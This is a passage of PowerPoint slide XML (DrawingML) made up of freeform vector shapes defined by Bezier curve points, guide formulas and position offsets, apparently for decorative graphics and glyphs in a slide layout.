                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="160"/>
                      <a:pt x="160" y="158"/>
                      <a:pt x="160" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="154"/>
                      <a:pt x="161" y="153"/>
                      <a:pt x="161" y="152"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="68"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="71"/>
                      <a:pt x="75" y="73"/>
                      <a:pt x="78" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="74"/>
                      <a:pt x="85" y="73"/>
                      <a:pt x="89" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="70"/>
                      <a:pt x="95" y="68"/>
                      <a:pt x="98" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="66"/>
                      <a:pt x="100" y="66"/>
                      <a:pt x="101" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="65"/>
                      <a:pt x="102" y="66"/>
                      <a:pt x="102" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="67"/>
                      <a:pt x="102" y="67"/>
                      <a:pt x="102" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="68"/>
                      <a:pt x="100" y="69"/>
                      <a:pt x="99" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="71"/>
                      <a:pt x="91" y="74"/>
                      <a:pt x="87" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="78"/>
                      <a:pt x="83" y="80"/>
                      <a:pt x="81" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="82"/>
                      <a:pt x="76" y="82"/>
                      <a:pt x="74" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="70" y="74"/>
                      <a:pt x="68" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="71"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="66" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="73"/>
                      <a:pt x="65" y="75"/>
                      <a:pt x="64" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="79"/>
                      <a:pt x="62" y="81"/>
                      <a:pt x="61" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="86"/>
                      <a:pt x="58" y="89"/>
                      <a:pt x="58" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="94"/>
                      <a:pt x="58" y="96"/>
                      <a:pt x="59"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6"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8" y="121"/>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="123"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="127"/>
                      <a:pt x="36" y="131"/>
                      <a:pt x="37" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="138"/>
                      <a:pt x="38" y="140"/>
                      <a:pt x="40" y="142"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="146"/>
                      <a:pt x="48" y="149"/>
                      <a:pt x="52" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="157"/>
                      <a:pt x="62" y="161"/>
                      <a:pt x="67" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="167"/>
                      <a:pt x="70" y="169"/>
                      <a:pt x="69" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="175"/>
                      <a:pt x="67" y="176"/>
                      <a:pt x="65" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="177"/>
                      <a:pt x="63" y="177"/>
                      <a:pt x="63" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="180"/>
                      <a:pt x="65" y="181"/>
                      <a:pt x="66" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="186"/>
                      <a:pt x="69" y="188"/>
                      <a:pt x="70" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="194"/>
                      <a:pt x="70" y="195"/>
                      <a:pt x="70" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="197"/>
                      <a:pt x="71" y="197"/>
                      <a:pt x="71" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="195"/>
                      <a:pt x="73" y="193"/>
                      <a:pt x="73" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="188"/>
                      <a:pt x="71" y="186"/>
                      <a:pt x="69" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="183"/>
                      <a:pt x="68" y="183"/>
                      <a:pt x="69" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="181"/>
                      <a:pt x="71" y="181"/>
                      <a:pt x="72" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="184"/>
                      <a:pt x="77" y="185"/>
                      <a:pt x="79" y="186"/>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3"/>
                      <a:pt x="117" y="174"/>
                      <a:pt x="117" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="178"/>
                      <a:pt x="117" y="182"/>
                      <a:pt x="116" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="188"/>
                      <a:pt x="114" y="190"/>
                      <a:pt x="114" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="194"/>
                      <a:pt x="114" y="195"/>
                      <a:pt x="117" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="191"/>
                      <a:pt x="118" y="186"/>
                      <a:pt x="119" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="178"/>
                      <a:pt x="120" y="175"/>
                      <a:pt x="120" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="167"/>
                      <a:pt x="119" y="163"/>
                      <a:pt x="118" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="156"/>
                      <a:pt x="118" y="153"/>
                      <a:pt x="120" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="147"/>
                      <a:pt x="123" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="146"/>
                      <a:pt x="127" y="146"/>
                      <a:pt x="127" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="142"/>
                      <a:pt x="129" y="140"/>
                      <a:pt x="133" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="138"/>
                      <a:pt x="142" y="138"/>
                      <a:pt x="146" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="138"/>
                      <a:pt x="142" y="137"/>
                      <a:pt x="140" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="146" y="119"/>
                      <a:pt x="136" y="97"/>
                      <a:pt x="127" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="97"/>
                      <a:pt x="134" y="103"/>
                      <a:pt x="137" y="110"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="117"/>
                      <a:pt x="140" y="123"/>
                      <a:pt x="139" y="131"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="135"/>
                      <a:pt x="136" y="138"/>
                      <a:pt x="132" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="138"/>
                      <a:pt x="129" y="137"/>
                      <a:pt x="128" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="133"/>
                      <a:pt x="128" y="131"/>
                      <a:pt x="128" y="129"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="121"/>
                      <a:pt x="127" y="114"/>
                      <a:pt x="124" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="103"/>
                      <a:pt x="121" y="98"/>
                      <a:pt x="118" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="94"/>
                      <a:pt x="117" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="86"/>
                      <a:pt x="113" y="79"/>
                      <a:pt x="108" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="70"/>
                      <a:pt x="105" y="67"/>
                      <a:pt x="106" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="62"/>
                      <a:pt x="107" y="60"/>
                      <a:pt x="107" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="56"/>
                      <a:pt x="107" y="54"/>
                      <a:pt x="104" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="52"/>
                      <a:pt x="98" y="51"/>
                      <a:pt x="94" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="48"/>
                      <a:pt x="91" y="47"/>
                      <a:pt x="91" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="43"/>
                      <a:pt x="92" y="41"/>
                      <a:pt x="92" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="93" y="37"/>
                      <a:pt x="95" y="36"/>
                      <a:pt x="98" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="37"/>
                      <a:pt x="101" y="38"/>
                      <a:pt x="102" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="42"/>
                      <a:pt x="104" y="45"/>
                      <a:pt x="102" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="48"/>
                      <a:pt x="102" y="49"/>
                      <a:pt x="103" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="51"/>
                      <a:pt x="107" y="50"/>
                      <a:pt x="107" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="44"/>
                      <a:pt x="108" y="39"/>
                      <a:pt x="106" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="31"/>
                      <a:pt x="100" y="29"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="30"/>
                      <a:pt x="88" y="33"/>
                      <a:pt x="87" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="39"/>
                      <a:pt x="87" y="40"/>
                      <a:pt x="87" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="43"/>
                      <a:pt x="87" y="45"/>
                      <a:pt x="87" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="45"/>
                      <a:pt x="83" y="46"/>
                      <a:pt x="81" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="46"/>
                      <a:pt x="80" y="46"/>
                      <a:pt x="80" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="46"/>
                      <a:pt x="78" y="45"/>
                      <a:pt x="78" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="41"/>
                      <a:pt x="77" y="38"/>
                      <a:pt x="77" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="35"/>
                      <a:pt x="76" y="35"/>
                      <a:pt x="76" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="32"/>
                      <a:pt x="73" y="31"/>
                      <a:pt x="71" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="31"/>
                      <a:pt x="67" y="32"/>
                      <a:pt x="66" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="39"/>
                      <a:pt x="64" y="45"/>
                      <a:pt x="66" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="50"/>
                      <a:pt x="68" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="70" y="50"/>
                      <a:pt x="70" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="48"/>
                      <a:pt x="68" y="48"/>
                      <a:pt x="67" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="45"/>
                      <a:pt x="66" y="42"/>
                      <a:pt x="67" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="37"/>
                      <a:pt x="71" y="36"/>
                      <a:pt x="73" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="39"/>
                      <a:pt x="75" y="42"/>
                      <a:pt x="75" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="46"/>
                      <a:pt x="75" y="47"/>
                      <a:pt x="73" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="48"/>
                      <a:pt x="73" y="49"/>
                      <a:pt x="73" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="51"/>
                      <a:pt x="69" y="52"/>
                      <a:pt x="67" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="54"/>
                      <a:pt x="65" y="55"/>
                      <a:pt x="64" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="58"/>
                      <a:pt x="64" y="59"/>
                      <a:pt x="65" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="60"/>
                      <a:pt x="68" y="61"/>
                      <a:pt x="68" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="66"/>
                      <a:pt x="74" y="66"/>
                      <a:pt x="78" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="66"/>
                      <a:pt x="87" y="65"/>
                      <a:pt x="91" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="62"/>
                      <a:pt x="99" y="62"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="103" y="58"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="58"/>
                      <a:pt x="104" y="59"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="63"/>
                      <a:pt x="92" y="65"/>
                      <a:pt x="87" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="69"/>
                      <a:pt x="79" y="69"/>
                      <a:pt x="75" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="69"/>
                      <a:pt x="72" y="69"/>
                      <a:pt x="71" y="68"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="43"/>
                      <a:pt x="73" y="41"/>
                      <a:pt x="72" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="40"/>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="41"/>
                      <a:pt x="71" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="41"/>
                      <a:pt x="72" y="42"/>
                      <a:pt x="72" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="44"/>
                      <a:pt x="72" y="45"/>
                      <a:pt x="73" y="45"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="97" y="39"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="40"/>
                      <a:pt x="100" y="42"/>
                      <a:pt x="100" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="41"/>
                      <a:pt x="101" y="40"/>
                      <a:pt x="100"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301"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6802" y="789"/>
                <a:ext cx="3" cy="2"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3 w 3"/>
                  <a:gd name="T1" fmla="*/ 0 h 2"/>
                  <a:gd name="T2" fmla="*/ 2 w 3"/>
                  <a:gd name="T3" fmla="*/ 1 h 2"/>
                  <a:gd name="T4" fmla="*/ 0 w 3"/>
                  <a:gd name="T5" fmla="*/ 2 h 2"/>
                  <a:gd name="T6" fmla="*/ 1 w 3"/>
                  <a:gd name="T7" fmla="*/ 1 h 2"/>
                  <a:gd name="T8" fmla="*/ 2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cubicBezTo>
                      <a:pt x="2" y="0"/>
                      <a:pt x="2" y="1"/>
                      <a:pt x="2" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="2"/>
                      <a:pt x="1" y="2"/>
                      <a:pt x="0" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="2"/>
                      <a:pt x="0" y="1"/>
                      <a:pt x="1" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="0"/>
                      <a:pt x="2" y="0"/>
                      <a:pt x="2"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Freeform 302"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6815" y="789"/>
                <a:ext cx="4" cy="1"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3"/>
                  <a:gd name="T1" fmla="*/ 0 h 1"/>
                  <a:gd name="T2" fmla="*/ 2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2" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="0"/>
                      <a:pt x="3" y="1"/>
                      <a:pt x="3" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="1"/>
                      <a:pt x="2"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Freeform 303"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="203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Freeform 304"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="222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305"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2425" y="1468"/>
                <a:ext cx="82"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Freeform 306"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2573"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307"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2768"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Freeform 308"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2965"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309"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3114"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Freeform 310"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3311" y="1468"/>
                <a:ext cx="83"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311"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3460"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Freeform 312"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3609"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1" y="134"/>
                      <a:pt x="0" y="120"/>
                      <a:pt x="0" y="105"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="88"/>
                      <a:pt x="2" y="73"/>
                      <a:pt x="4" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="46"/>
                      <a:pt x="11" y="35"/>
                      <a:pt x="17" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="18"/>
                      <a:pt x="30" y="11"/>
                      <a:pt x="38" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="2"/>
                      <a:pt x="55"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313"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3794" y="147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Freeform 314"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4223"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1 w 63"/>
                  <a:gd name="T19" fmla="*/ 44 h 241"/>
                  <a:gd name="T20" fmla="*/ 41 w 63"/>
                  <a:gd name="T21" fmla="*/ 85 h 241"/>
                  <a:gd name="T22" fmla="*/ 21 w 63"/>
                  <a:gd name="T23" fmla="*/ 120 h 241"/>
                  <a:gd name="T24" fmla="*/ 21 w 63"/>
                  <a:gd name="T25" fmla="*/ 120 h 241"/>
                  <a:gd name="T26" fmla="*/ 41 w 63"/>
                  <a:gd name="T27" fmla="*/ 155 h 241"/>
                  <a:gd name="T28" fmla="*/ 41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1" y="27"/>
                      <a:pt x="41" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="85"/>
                      <a:pt x="41" y="85"/>
                      <a:pt x="41" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="104"/>
                      <a:pt x="34" y="115"/>
                      <a:pt x="21" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="120"/>
                      <a:pt x="21" y="120"/>
                      <a:pt x="21" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="124"/>
                      <a:pt x="41" y="136"/>
                      <a:pt x="41" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="195"/>
                      <a:pt x="41" y="195"/>
                      <a:pt x="41" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="205"/>
                      <a:pt x="43" y="212"/>
                      <a:pt x="46" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49"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315"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4330" y="1473"/>
                <a:ext cx="77" cy="294"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 63"/>
                  <a:gd name="T1" fmla="*/ 128 h 241"/>
                  <a:gd name="T2" fmla="*/ 42 w 63"/>
                  <a:gd name="T3" fmla="*/ 157 h 241"/>
                  <a:gd name="T4" fmla="*/ 42 w 63"/>
                  <a:gd name="T5" fmla="*/ 198 h 241"/>
                  <a:gd name="T6" fmla="*/ 0 w 63"/>
                  <a:gd name="T7" fmla="*/ 241 h 241"/>
                  <a:gd name="T8" fmla="*/ 0 w 63"/>
                  <a:gd name="T9" fmla="*/ 223 h 241"/>
                  <a:gd name="T10" fmla="*/ 17 w 63"/>
                  <a:gd name="T11" fmla="*/ 216 h 241"/>
                  <a:gd name="T12" fmla="*/ 22 w 63"/>
                  <a:gd name="T13" fmla="*/ 195 h 241"/>
                  <a:gd name="T14" fmla="*/ 22 w 63"/>
                  <a:gd name="T15" fmla="*/ 155 h 241"/>
                  <a:gd name="T16" fmla="*/ 42 w 63"/>
                  <a:gd name="T17" fmla="*/ 120 h 241"/>
                  <a:gd name="T18" fmla="*/ 42 w 63"/>
                  <a:gd name="T19" fmla="*/ 120 h 241"/>
                  <a:gd name="T20" fmla="*/ 22 w 63"/>
                  <a:gd name="T21" fmla="*/ 85 h 241"/>
                  <a:gd name="T22" fmla="*/ 22 w 63"/>
                  <a:gd name="T23" fmla="*/ 44 h 241"/>
                  <a:gd name="T24" fmla="*/ 0 w 63"/>
                  <a:gd name="T25" fmla="*/ 17 h 241"/>
                  <a:gd name="T26" fmla="*/ 0 w 63"/>
                  <a:gd name="T27" fmla="*/ 0 h 241"/>
                  <a:gd name="T28" fmla="*/ 42 w 63"/>
                  <a:gd name="T29" fmla="*/ 43 h 241"/>
                  <a:gd name="T30" fmla="*/ 42 w 63"/>
                  <a:gd name="T31" fmla="*/ 83 h 241"/>
                  <a:gd name="T32" fmla="*/ 63 w 63"/>
                  <a:gd name="T33" fmla="*/ 112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Freeform 316"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4441"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317"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4636"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Freeform 318"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4833"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319"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4982"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Freeform 320"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5180" y="1468"/>
                <a:ext cx="82"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321"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
